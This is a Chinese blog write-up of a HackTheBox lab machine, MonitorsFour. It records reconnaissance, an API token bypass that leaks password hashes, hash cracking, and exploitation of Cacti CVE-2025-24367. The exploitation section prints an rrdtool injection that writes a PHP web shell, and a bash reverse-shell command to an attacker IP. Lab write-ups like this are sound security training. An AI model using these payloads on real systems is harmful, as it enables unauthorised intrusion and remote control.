{"id":355,"date":"2025-12-10T21:23:30","date_gmt":"2025-12-10T13:23:30","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=355"},"modified":"2026-01-29T16:18:59","modified_gmt":"2026-01-29T08:18:59","slug":"355","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/12\/10\/355\/","title":{"rendered":"HTB\u9776\u673a MonitorsFour \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code><strong>10.129.45.174<\/strong><\/code><strong>\uff08\u975e\u56fa\u5b9aIP\u5730\u5740\uff09<\/strong><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.129.45.174 (10.129.45.174) 56(84) bytes of data.\n64 bytes from 10.129.45.174: icmp_seq=1 ttl=127 time=264 ms\n64 bytes from 10.129.45.174: icmp_seq=2 ttl=127 time=282 ms\n64 bytes from 10.129.45.174: icmp_seq=3 ttl=127 time=281 ms\n64 bytes from 10.129.45.174: icmp_seq=4 ttl=127 time=279 ms\n\n--- 10.129.45.174 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3005ms\nrtt min\/avg\/max\/mdev = 264.334\/276.563\/282.135\/7.185 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u95f4\u7f51\u7edc\u901a\u4fe1\u6b63\u5e38\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Dec  7 07:27:28 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.45.174\nNmap scan report for 10.129.45.174\nHost is up (0.28s latency).\nAll 65535 scanned ports on 10.129.45.174 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Sun Dec  7 07:28:22 2025 -- 1 IP address (1 host up) scanned in 53.87 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u63a2\u6d4b\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code><strong>TCP<\/strong><\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Dec  7 07:31:17 2025 as: \/usr\/lib\/nmap\/nmap -sS -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.45.174\nNmap scan report for 10.129.45.174\nHost is up (0.27s latency).\nNot shown: 65533 filtered tcp ports (no-response)\nPORT     STATE SERVICE VERSION\n80\/tcp   open  http    nginx\n|_http-title: Did not follow redirect to http:\/\/monitorsfour.htb\/\n5985\/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI\/2.0\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: general purpose\nRunning (JUST GUESSING): Microsoft Windows 2022|2012|2016 (88%)\nOS CPE: cpe:\/o:microsoft:windows_server_2022 cpe:\/o:microsoft:windows_server_2012:r2 cpe:\/o:microsoft:windows_server_2016\nAggressive OS guesses: Microsoft Windows Server 2022 (88%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)\nNo exact OS matches for host (test conditions non-ideal).\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nTRACEROUTE (using port 80\/tcp)\nHOP RTT       ADDRESS\n1   275.22 ms 10.10.14.1\n2   276.02 ms 10.129.45.174\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Dec  7 07:32:38 2025 -- 1 IP address (1 host up) scanned in 81.48 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.95 scan initiated Sun Dec  7 07:33:33 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.45.174\nNmap scan report for 10.129.45.174\nHost is up (0.28s latency).\nAll 65535 scanned ports on 10.129.45.174 are in ignored states.\nNot shown: 65535 open|filtered udp ports (no-response)\n\n# Nmap done at Sun Dec  7 07:34:26 2025 -- 1 IP address (1 host up) scanned in 52.69 seconds<\/code><\/pre>\n<p><code><strong>UDP<\/strong><\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\">\uff08\u65e0\uff09<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u8fd0\u884c<code>Windows Server<\/code>\u64cd\u4f5c\u7cfb\u7edf\uff0c\u5f00\u653e\u4e86<code>80\/http<\/code>\u548c<code>5985\/winrm<\/code>\u4e24\u4e2a\u670d\u52a1\uff0c\u6839\u636e<code>HackTheBox<\/code>\u89c4\u5219\uff0c\u9776\u673a<code>Web<\/code>\u670d\u52a1\u548c<code>Active Directory<\/code>\u4e3b\u57df\u540d\u4e3a<code>monitorsfour.htb<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n<h3>\u5b50\u57df\u540d\u7206\u7834<\/h3>\n<p>\u5728\u5f00\u59cb\u8fdb\u884c<code>Web<\/code>\u670d\u52a1\u63a2\u6d4b\u524d\uff0c\u9996\u5148\u7206\u7834\u5b50\u57df\u540d\uff0c\u5b57\u5178\u4f7f\u7528<code>bitquark-subdomains-top100000.txt<\/code>\uff1a<\/p>\n<pre><code class=\"language-shell\">wfuzz -w \/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/bitquark-subdomains-top100000.txt -u 10.129.45.174 -t 70 -H \"Host: FUZZ.monitorsfour.htb\" --hh 138 --hc 400<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765066131259-a4eb8a6c-1b7c-4d27-a4f4-2da519d76932.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u5b50\u57df\u540d\u4e3a<code>cacti<\/code>\u65f6\uff0c<code>Web<\/code>\u670d\u52a1\u8fd4\u56de\u4e86<code>302<\/code>\u91cd\u5b9a\u5411\u5305\uff0c\u4f46\u6b63\u6587\u4e3a\u7a7a\u3002\u5c1d\u8bd5\u4f7f\u7528<code>curl<\/code>\u89c2\u5bdf<code>HTTP<\/code>\u54cd\u5e94\u7ec6\u8282\uff1a<\/p>\n<pre><code class=\"language-shell\">curl -v http:\/\/10.129.45.174 -H \"Host: cacti.monitorsfour.htb\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765066246527-70204208-a395-4f8b-9fc1-2b849f3b79f3.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0<code>Nginx<\/code>\u8fd4\u56de\u7684\u91cd\u5b9a\u5411\u5305<code>URI<\/code>\u4e3a<code>\/cacti<\/code>\uff0c\u5224\u5b9a\u5b50\u57df\u540d<code>cacti<\/code>\u5b58\u5728\uff01<\/p>\n<h3>\u4e3b\u7ad9\u70b9\u679a\u4e3e<\/h3>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/monitorsfour.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765075560061-230ea4cd-9859-4017-93d0-15217afa53dc.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u7ad9\u70b9\u4e3a\u4e00\u5bb6\u7f51\u7edc\u8fd0\u7ef4\u670d\u52a1\u516c\u53f8\u7684\u4e1a\u52a1\u7f51\u7ad9\u3002\u901a\u8bfb\u7f51\u9875\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u9875\u9762\u5e95\u90e8\u5b58\u5728\u4e00\u4e2a\u7535\u5b50\u90ae\u7bb1<code>sales@monitorsfour.htb<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765075829355-f34ec65c-8fe9-4459-894a-6479a6e67724.png\" alt=\"\" \/><\/p>\n<p>\u70b9\u51fb<code>Login<\/code>\u6309\u94ae\uff0c\u8df3\u8f6c\u5230\u767b\u5f55\u9875\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765075957504-8056288e-d655-4bb3-90f5-51d93e6ec5e3.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u767b\u5f55\u6846\u5e95\u90e8\u5b58\u5728\u53ef\u8df3\u8f6c\u81f3\u5fd8\u8bb0\u5bc6\u7801\u754c\u9762\u7684\u94fe\u63a5\u3002\u70b9\u51fb\u94fe\u63a5\u8df3\u8f6c\u5230\u8be5\u754c\u9762\uff0c\u53d1\u73b0\u65e0\u6cd5\u4f7f\u7528\u8be5\u529f\u80fd\u5224\u65ad\u7528\u6237\u540d\u662f\u5426\u5b58\u5728\uff0c\u56e0\u4e3a\u65e0\u8bba\u8f93\u5165\u4ec0\u4e48\u5185\u5bb9\uff0c\u8be5\u529f\u80fd\u90fd\u4f1a\u8fd4\u56de\u201c\u5982\u679c\u90ae\u7bb1\u5730\u5740\u5df2\u6ce8\u518c\u5c31\u4f1a\u53d1\u9001\u90ae\u4ef6\u201d\u7684\u63d0\u793a\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765077185843-25ea89eb-26f0-4be1-83d3-c844defe0ec7.png\" alt=\"\" \/><\/p>\n<p>\u67e5\u770b\u7f51\u9875\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u5f53\u524d\u9875\u9762\u5b9e\u9645\u8c03\u7528\u4e86<code>\/api\/v1\/reset<\/code>\u63a5\u53e3\u6267\u884c\u4e86\u67e5\u8be2\u7528\u6237\u548c\u53d1\u9001\u5bc6\u7801\u6062\u590d\u90ae\u4ef6\u7684\u529f\u80fd\uff1a<\/p>\n<pre><code class=\"language-html\">&lt;form action=\"\/api\/v1\/reset\" method=\"POST\"&gt;\n  &lt;div class=\"panel panel-body login-form\"&gt;\n    &lt;div class=\"text-center\"&gt;\n      &lt;div &gt;&lt;img src=\"static\/admin\/assets\/images\/logo.ico\" style=\"width:100px;height:100px;\"&gt;&lt;\/img&gt;&lt;\/div&gt;\n      &lt;h5 class=\"content-group\"&gt;Password recovery &lt;small class=\"display-block\"&gt;We'll send you instructions in email&lt;\/small&gt;&lt;\/h5&gt;\n    &lt;\/div&gt;\n\n    &lt;div class=\"form-group has-feedback\"&gt;\n      &lt;input type=\"text\" name=\"email\" class=\"form-control\" placeholder=\"Your email\"&gt;\n      &lt;div class=\"form-control-feedback\"&gt;\n        &lt;i class=\"icon-user text-muted\"&gt;&lt;\/i&gt;\n      &lt;\/div&gt;\n    &lt;\/div&gt;\n    &lt;button type=\"submit\" class=\"btn bg-blue btn-block\"&gt;Reset password &lt;i class=\"icon-arrow-right14 position-right\"&gt;&lt;\/i&gt;&lt;\/button&gt;\n  &lt;\/div&gt;\n&lt;\/form&gt;<\/code><\/pre>\n<p>\u76f4\u63a5\u626b\u63cf<code>\/api\/v1<\/code>\u540e\u7aef\u63a5\u53e3\uff1a<\/p>\n<pre><code class=\"language-shell\">dirsearch -u http:\/\/monitorsfour.htb\/api\/v1 -x 400,403,404 -t 70 -e php,js,html,txt,zip,tar.gz,xml,json<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765093035192-b72522ec-4ac5-4136-9f3f-c968782bdb79.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9664\u4e86<code>auth<\/code>\u3001<code>logout<\/code>\u3001<code>reset<\/code>\u63a5\u53e3\u5916\uff0c\u8fd8\u5b58\u5728<code>user<\/code>\u548c<code>users<\/code>\u63a5\u53e3\u3002<\/p>\n<p>\u5c1d\u8bd5\u8bbf\u95ee<code>\/api\/v1\/users<\/code>\u63a5\u53e3\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765093225075-85b2ea6a-8d2a-488f-ba3e-8d1170ea9345.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9700\u8981\u6211\u4eec\u63d0\u4f9b<code>API Token<\/code>\u8bbf\u95ee\u5bc6\u94a5\u3002<\/p>\n<p>\u5c1d\u8bd5\u626b\u63cf\u7ad9\u70b9\u6839\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-shell\">dirsearch -u http:\/\/monitorsfour.htb -x 400,403,404 -t 70 -e php,js,html,txt,zip,tar.gz,xml,json<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765093784057-98bec07d-ec3e-4f20-91dd-9f7b46652dd8.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u6839\u76ee\u5f55\u4e0b\u5b58\u5728<code>.env<\/code>\u6587\u4ef6\uff0c\u9664\u524d\u7aef\u9759\u6001\u6587\u4ef6\u548c<code>HTML<\/code>\u6a21\u677f\u76ee\u5f55\u5916\uff0c\u8fd8\u5b58\u5728<code>\/contact<\/code>\u63a5\u53e3\u3002\u9996\u5148\u8bbf\u95ee<code>.env<\/code>\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-properties\">DB_HOST=mariadb\nDB_PORT=3306\nDB_NAME=monitorsfour_db\nDB_USER=monitorsdbuser\nDB_PASS=f37p2j8f4t0r<\/code><\/pre>\n<p>\u53d1\u73b0\u4e3a\u7f51\u7ad9\u6570\u636e\u5e93\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u670d\u52a1\u5668\uff1a<code>localhost:3306<\/code><\/li>\n<li>\u7528\u6237\u540d\uff1a<code>monitorsdbuser<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>f37p2j8f4t0r<\/code><\/li>\n<li>\u6570\u636e\u5e93\uff1a<code>monitorsfour_db<\/code><\/li>\n<\/ul>\n<p>\u8bbf\u95ee<code>\/contact<\/code>\u63a5\u53e3\uff0c\u53d1\u73b0\u8be5\u63a5\u53e3\u5c1a\u672a\u5b8c\u6210\u7f16\u5199\uff0c\u5bfc\u81f4<code>PHP<\/code>\u62a5\u9519\u4e2d\u66b4\u9732\u4e86\u7f51\u7ad9\u76ee\u5f55\u7edd\u5bf9\u8def\u5f84<code>\/var\/www\/app<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765094102807-378473fd-dbb4-44f3-90d4-2c3d60f74617.png\" alt=\"\" \/><\/p>\n<p>\u9664\u6b64\u4e4b\u5916\uff0c\u672a\u53d1\u73b0\u4efb\u4f55\u4fe1\u606f\u3002<\/p>\n<h3>\u5b50\u7ad9\u70b9\u679a\u4e3e<\/h3>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/cacti.monitorsfour.htb\/cacti<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765093323404-88309166-540d-4f83-9c09-a4b01262027f.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u8be5\u5b50\u7ad9\u70b9\u90e8\u7f72\u4e86<code>Cacti<\/code>\u7f51\u7edc\u8bbe\u5907\u76d1\u63a7\u7cfb\u7edf\uff0c\u7248\u672c\u4e3a<code>v1.2.28<\/code>\u3002<\/p>\n<p>\u5c1d\u8bd5\u8054\u7f51\u67e5\u8be2\u76f8\u5173\u4fe1\u606f\uff0c\u53d1\u73b0\u8be5\u7248\u672c<code>Cacti<\/code>\u5b58\u5728\u6388\u6743\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e<code>CVE-2025-24367<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765093581507-4764edd9-f7f9-446e-9276-c13a2bdc0d0e.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u9ed8\u8ba4\u7ba1\u7406\u5458\u8d26\u6237\u51ed\u636e<code>admin:admin<\/code>\u767b\u5f55\uff0c\u5931\u8d25\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765094220802-51492fba-8a7d-47e4-b0e4-bc560119ed8a.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<h2>API\u9274\u6743\u7ed5\u8fc7\u83b7\u53d6\u7528\u6237\u54c8\u5e0c<\/h2>\n<p>\u5728\u670d\u52a1\u63a2\u6d4b\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u5df2\u7ecf\u53d1\u73b0\u4e3b\u7ad9\u70b9\u5b58\u5728<code>API<\/code>\u63a5\u53e3<code>\/api\/v1<\/code>\uff0c\u4e14\u63a5\u53e3\u4e2d\u6709\u7aef\u70b9<code>\/users<\/code>\uff0c\u63d0\u793a\u9700\u8981\u63d0\u4f9b<code>Token<\/code>\u503c\u8fdb\u884c\u64cd\u4f5c\u3002<\/p>\n<p>\u8bbf\u95ee<code>http:\/\/monitorsfour.htb\/api\/v1\/users<\/code>\uff0c\u5c1d\u8bd5\u6dfb\u52a0<code>token<\/code>\u53c2\u6570\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765094625673-0c2164cc-f705-481a-810b-e812c873cca2.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9519\u8bef\u4fe1\u606f\u53d8\u6210\u4e86<code>Invalid or missing token<\/code>\u3002<\/p>\n<p>\u5c1d\u8bd5\u5c06<code>token<\/code>\u7684\u53c2\u6570\u503c\u8bbe\u4e3a<code>0<\/code>\uff0c\u53d1\u73b0\u901a\u8fc7\u4e86<code>API Token<\/code>\u9274\u6743\uff0c\u63a5\u53e3\u8fd4\u56de\u4e86\u7528\u6237\u4fe1\u606f\uff0c\u5176\u4e2d\u5305\u62ec<code>MD5<\/code>\u5bc6\u7801\u54c8\u5e0c\u503c\uff0c\u4ee5\u53ca\u7f51\u7ad9\u7528\u6237\u7684\u771f\u5b9e\u82f1\u6587\u59d3\u540d\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765094749108-88ea1aa8-08b0-4c16-ac01-c84a7e08148e.png\" alt=\"\" \/><\/p>\n<p>\u4f7f\u7528<code>hashcat<\/code>\u5de5\u5177\uff0c\u5bf9<code>admin<\/code>\u7528\u6237\u7684\u5bc6\u7801\u54c8\u5e0c\u503c<code>56b32eb43e6f15395f6c46c1c9e1cd36<\/code>\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-shell\">.\/hashcat.exe -m 0 -a 0 \"56b32eb43e6f15395f6c46c1c9e1cd36\" .\/rockyou.txt --force<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765094871128-d81038c5-3fc1-4109-a712-e1eeff5da18d.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u7f51\u7ad9\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>admin<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>wonderful1<\/code><\/li>\n<li>\u7528\u6237\u771f\u5b9e\u59d3\u540d\uff1a<code>Marcus Higgins<\/code><\/li>\n<\/ul>\n<p>\u76f4\u63a5\u767b\u5f55\u7ad9\u70b9\u540e\u53f0\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765095191485-8addbe1f-2a02-49e8-a9d6-1ebde885adc5.png\" alt=\"\" \/><\/p>\n<p>\u67e5\u770b\u529f\u80fd\u540e\uff0c\u53d1\u73b0\u540e\u53f0\u5e76\u65e0\u53ef\u7ee7\u7eed\u5229\u7528\u7684\u653b\u51fb\u9762\uff0c\u9042\u8f6c\u5230\u5b50\u7ad9\u70b9\u679a\u4e3e\u3002\u5728<code>Cacti<\/code>\u767b\u5f55\u6846\u4e2d\u8f93\u5165\u4e0a\u8ff0\u51ed\u636e\uff0c\u53d1\u73b0\u51ed\u636e\u4e0d\u6b63\u786e\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765095366084-8e015732-beae-4906-963c-68080e02b40d.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u4e3b\u7ad9\u70b9\u7ba1\u7406\u5458\u7528\u6237<code>admin<\/code>\u7684\u771f\u5b9e\u82f1\u6587\u5c0f\u540d<code>marcus<\/code>\u4f5c\u4e3a\u7528\u6237\u540d\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765095457433-ac71e987-8e75-47c0-aa16-4dd8a00e7a10.png\" alt=\"\" \/><\/p>\n<p>\u767b\u5f55\u6210\u529f\uff01\u53d1\u73b0<code>Cacti<\/code>\u7528\u6237\u51ed\u636e\uff1a<\/p>\n<ul>\n<li>\u7528\u6237\u540d\uff1a<code>marcus<\/code><\/li>\n<li>\u5bc6\u7801\uff1a<code>wonderful1<\/code><\/li>\n<\/ul>\n<h2>CVE-2025-24367\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u6210\u529f\u767b\u5f55<code>Cacti<\/code>\u540e\uff0c\u8fdb\u884c<code>RCE<\/code>\u6f0f\u6d1e\u5229\u7528\uff1a<a href=\"https:\/\/github.com\/vulhub\/vulhub\/blob\/master\/cacti\/CVE-2025-24367\/README.md\" target=\"_blank\"  rel=\"nofollow\" >vulhub\/cacti\/CVE-2025-24367\/README.md at master \u00b7 vulhub\/vulhub \u00b7 GitHub<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765097037482-0363cc0f-f99f-441c-bae1-8bf49ef65c42.png\" alt=\"\" \/><\/p>\n<p>\u9996\u5148\u5207\u6362\u81f3<code>Cacti<\/code>\u540e\u53f0\u7684\u201c\u6a21\u677f -&gt; \u56fe\u5f62\u6a21\u677f\u201d\u529f\u80fd\uff0c\u5728\u641c\u7d22\u6846\u4e2d\u67e5\u627e<code>Advanced Ping<\/code>\u6a21\u677f\uff0c\u70b9\u51fb\u8fdb\u5165\u9879\u76ee\u5217\u8868\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765097181583-00c9ce8b-10e0-420d-a7d4-b1e27d669ac4.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u6253\u5f00<code>BurpSuite<\/code>\u4ee3\u7406\uff0c\u76f4\u63a5\u70b9\u51fb\u9875\u9762\u672b\u5c3e\u7684\u4fdd\u5b58\u6309\u94ae\uff0c\u6355\u83b7\u7f51\u7edc\u8bf7\u6c42\u5305\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765097464303-6fac0a78-e204-43dc-9096-8054339e7c3d.png\" alt=\"\" \/><\/p>\n<p>\u5c06\u8bf7\u6c42\u53d1\u9001\u5230<code>Repeater<\/code>\uff0c\u627e\u5230<code>right_axis_label<\/code>\u53c2\u6570\uff0c\u5c06\u4e0b\u9762\u7684<code>EXP<\/code>\u8fdb\u884c<code>URL<\/code>\u7f16\u7801\u540e\u586b\u5165\u53d1\u9001\uff08\u6ce8\u610f\u7f16\u7801\u540e\u7684<code>Payload<\/code>\u672b\u5c3e\u5e94\u8be5\u52a0\u4e0a\u4e00\u4e2a<code>%0a<\/code>\uff09\uff1a<\/p>\n<pre><code class=\"language-plain\">XXX\ncreate my.rrd --step 300 DS:temp:GAUGE:600:-273:5000 RRA:AVERAGE:0.5:1:1200\ngraph shell.php -s now -a CSV DEF:out=my.rrd:temp:AVERAGE LINE1:out:&lt;?=system($_GET[0]);?&gt;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765108948990-2e2be5a4-b1e0-4c57-b45e-dab3d83ecb28.png\" alt=\"\" \/><\/p>\n<p>\u4fee\u6539\u6210\u529f\uff01\u5207\u6362\u5230\u63a7\u5236\u53f0\u7684\u201c\u521b\u5efa -&gt; \u65b0\u56fe\u5f62\u201d\u529f\u80fd\uff0c\u4f7f\u7528<code>Advanced Ping<\/code>\u6a21\u677f\u65b0\u5efa\u4e00\u4e2a\u6076\u610f\u6536\u96c6\u5206\u6790\u5668\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765097939253-7ff1b991-1d51-45fd-aa1a-787266908e53.png\" alt=\"\" \/><\/p>\n<p>\u70b9\u51fb\u521b\u5efa\uff0c\u6210\u529f\u540e\u5207\u6362\u5230\u9876\u7aef\u7684\u201c\u56fe\u5f62\u201d\u9009\u9879\u5361\uff0c\u70b9\u51fb\u6811\u72b6\u56fe\u4e2d\u7684<code>Linux Local Machine<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765108994255-62ceb981-375d-49f5-8cad-df649c177f26.png\" alt=\"\" \/><\/p>\n<p>\u76f4\u63a5\u7b5b\u9009\u51fa<code>PING - Advanced Ping<\/code>\u6a21\u677f\u56fe\u5f62\u5206\u6790\u5668\uff0c\u70b9\u51fb\u53f3\u4e0a\u89d2\u7684\u8bbe\u7f6e\u6309\u94ae\uff0c\u8fdb\u5165\u5b9e\u7528\u5de5\u5177\u89c6\u56fe\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765109101889-36512f6f-f0ac-40b1-8376-2f4c432e933d.png\" alt=\"\" \/><\/p>\n<p>\u6700\u540e\u70b9\u51fb\u53f3\u4e0a\u89d2\u7684\u201c\u56fe\u884c\u6570\u636e\u201d\u6309\u94ae\u89e6\u53d1\u6076\u610f\u547d\u4ee4\uff0c\u8bbf\u95ee<code>http:\/\/cacti.monitorsfour.htb\/cacti\/shell.php<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765109240343-204a4b21-e83d-444b-b8b1-6c6680b034e8.png\" alt=\"\" \/><\/p>\n<p>\u6728\u9a6c\u5199\u5165\u6210\u529f\uff01\u76f4\u63a5\u6267\u884c\u53cd\u5f39<code>Shell<\/code>\u547d\u4ee4\uff08\u9700\u8981<code>URL<\/code>\u7f16\u7801\uff09\uff1a<\/p>\n<pre><code class=\"language-plain\">\/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/10.10.14.101\/443 0&gt;&amp;1'<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765109363512-93d69d41-d58f-4177-bfa7-396fa1df95d1.png\" alt=\"\" \/><\/p>\n<p><strong>\u53cd\u5f39Shell\u6210\u529f\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u76ee\u5f55\u4fe1\u606f\u6536\u96c6<\/h2>\n<p>\u8fdb\u5165\u7cfb\u7edf\u540e\uff0c\u6267\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\u3002\u5728\u6839\u76ee\u5f55\u4e0b\u53d1\u73b0<code>.dockerenv<\/code>\u6587\u4ef6\uff0c\u8bf4\u660e\u5f53\u524d\u5904\u4e8e<code>Docker<\/code>\u5bb9\u5668\u5185\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765366333657-594c8b99-14c6-4c67-917c-93e2dedaed7e.png\" alt=\"\" \/><\/p>\n<p>\u67e5\u770b<code>Cacti<\/code>\u76d1\u63a7\u7cfb\u7edf<code>SQL<\/code>\u8fde\u63a5\u914d\u7f6e\u6587\u4ef6<code>.\/include\/config.php<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2025\/png\/42816956\/1765367058056-436deb18-54a2-41b6-a498-b5476ed88c2d.png\" alt=\"\" 